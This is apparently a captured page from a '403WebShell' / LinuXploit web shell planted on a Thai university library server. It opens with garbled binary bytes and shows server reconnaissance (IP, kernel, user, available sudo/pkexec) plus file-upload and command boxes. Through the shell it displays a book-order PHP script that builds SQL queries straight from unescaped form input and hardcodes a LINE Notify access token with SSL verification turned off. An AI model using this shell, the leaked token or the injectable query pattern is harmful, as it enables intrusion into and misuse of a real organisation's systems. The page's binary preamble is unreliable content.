h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/lib/selectbook2021/pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/lib/selectbook2021/pages/select_book_confirm.php
<?ob_start();?>
<?
session_start();
?>
<?php include 'dbconnect.php';?>
<?php include 'header.php';?>

<?php
if ($_POST["submit"])
{
  if (!$_POST["first_name"]) {
?>
 	<p></p>
	<p>กรุณากรอกชื่อผู้สั่ง</p>
	<p><a href='javascript:history.back(1);'><button type="button" class="btn btn-default">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a></p>
<?php
  } elseif (!$_POST["last_name"]) {
?>
 	<p></p>
	<p>กรุณากรอกนามสกุล</p>
	<p><a href='javascript:history.back(1);'><button type="button" class="btn btn-default">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a></p>
<?php
  } elseif (!$_POST["department"]) {
?>
 	<p></p>
	<p>กรุณากรอกโปรแกรมวิชา</p>
	<p><a href='javascript:history.back(1);'><button type="button" class="btn btn-default">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a></p>
<?php
  } elseif (!$_POST["email"]) {
?>
 	<p></p>
	<p>กรุณากรอกอีเมล</p>
	<p><a href='javascript:history.back(1);'><button type="button" class="btn btn-default">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a></p>
<?php
  } elseif (!$_POST["phonenumber"]) {
?>
 	<p></p>
	<p>กรุณากรอกหมายเลขโทรศัพท์</p>
	<p><a href='javascript:history.back(1);'><button type="button" class="btn btn-default">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a></p>
<?php
  } else {
	$num_items = count($_SESSION["tbook_cart"]);
	if ($num_items>0) {
		//เพิ่มใน order_detail
		$sql = "SELECT * from order_detail ORDER BY order_id DESC";
		$query = mysqli_query($conn,$sql);
		if ($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
		{
			$new_order_id = $result["order_id"]+1;
		} else { //if ($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
			$new_order_id = 1;
		}		//if ($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
		
		$sql = "INSERT INTO order_detail ";
		$sql .="(order_id,first_name,last_name,user_type_id,faculty_id,department,email,phonenumber,database_id) ";
		$sql .="VALUES ";
		$sql .="(". $new_order_id . " ";
		$sql .=",'" . $_POST["first_name"] . "' ";	
		$sql .=",'" . $_POST["last_name"] . "' ";
		$sql .=",'" . $_POST["user_type_id"] . "' ";
		$sql .=",'" . $_POST["faculty_id"] . "' ";
		$sql .=",'" . $_POST["department"] . "' ";
		$sql .=",'" . $_POST["email"] . "' ";
		$sql .=",'" . $_POST["phonenumber"] . "' ";
		$sql .=",'" . "db0001" . "') ";
		
		$query = mysqli_query($conn,$sql);
		
		if($query)
		{
			//เพิ่มใน order_item วนลูปเพิ่มหนังสือแต่ละรายการ
			for($i=0;$i<$num_items;$i++) 
			{
				$sql = "INSERT INTO order_item ";
				$sql .="(order_id,book_id,order_status_id) ";
				$sql .="VALUES ";
				$sql .="(". $new_order_id . " ";
				$sql .="," . $_SESSION["tbook_cart"][$i] . " ";	
				$sql .=",'" . "stat001" . "') ";
				$query = mysqli_query($conn,$sql);			
			} //for($i=0;$i<$num_items;$i++) 
			
			//ส่ง line
			//ini_set('display_errors', 1);
			//ini_set('display_startup_errors', 1);
			//error_reporting(E_ALL);
			date_default_timezone_set("Asia/Bangkok");
		
			$sToken = "aurh51hFN8kUWUC6pmgBW6QQXd00qFLTIXbrsBIU8ph";
			$sMessage = "ผู้สั่งหนังสือภาษาไทย : " . $_POST["first_name"] . " " . $_POST["last_name"] . "\nOrder ID : " . $new_order_id ;
			$sMessage .= "\nhttp://arit.skru.ac.th/lib/selectbook2021/pages/order_detail.php?order_id=" . $new_order_id;
		
			
			$chOne = curl_init(); 
			curl_setopt( $chOne, CURLOPT_URL, "https://notify-api.line.me/api/notify"); 
			curl_setopt( $chOne, CURLOPT_SSL_VERIFYHOST, 0); 
			curl_setopt( $chOne, CURLOPT_SSL_VERIFYPEER, 0); 
			curl_setopt( $chOne, CURLOPT_POST, 1); 
			curl_setopt( $chOne, CURLOPT_POSTFIELDS, "message=".$sMessage); 
			$headers = array( 'Content-type: application/x-www-form-urlencoded', 'Authorization: Bearer '.$sToken.'', );
			curl_setopt($chOne, CURLOPT_HTTPHEADER, $headers); 
			curl_setopt( $chOne, CURLOPT_RETURNTRANSFER, 1); 
			$result = curl_exec( $chOne ); 
		
			//Result error 
			if(curl_error($chOne)) 
			{ 
				echo 'error:' . curl_error($chOne); 
			} 
			else { 
				$result_ = json_decode($result, true); 
				//echo "status : ".$result_['status']; echo "message : ". $result_['message'];
			} 
			curl_close( $chOne );   
			//จบส่ง line 
			
			//ลบข้อมูล $_SESSION["tbook_cart"] และ redirect
			$_SESSION["tbook_cart"] = array();
			$redirect_url = "order_detail.php?order_id=" . $new_order_id;
			header("location:$redirect_url");
	
		}
		else //if($query)
		{
			echo "ไม่สามารถบันทึกข้อมูลได้";
		}		//if($query)
	} else { //if ($num_items>0) 
?>
<h1 class="page-header"><font color="red">ไม่มีหนังสือในตะกร้า กรุณาเลือกหนังสือใส่ตะกร้า</font></h1>
<?php	
	} //if ($num_items>0) 
  } //  if (!$_POST["first_name"]) {
} //if ($_POST["submit"])
?>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit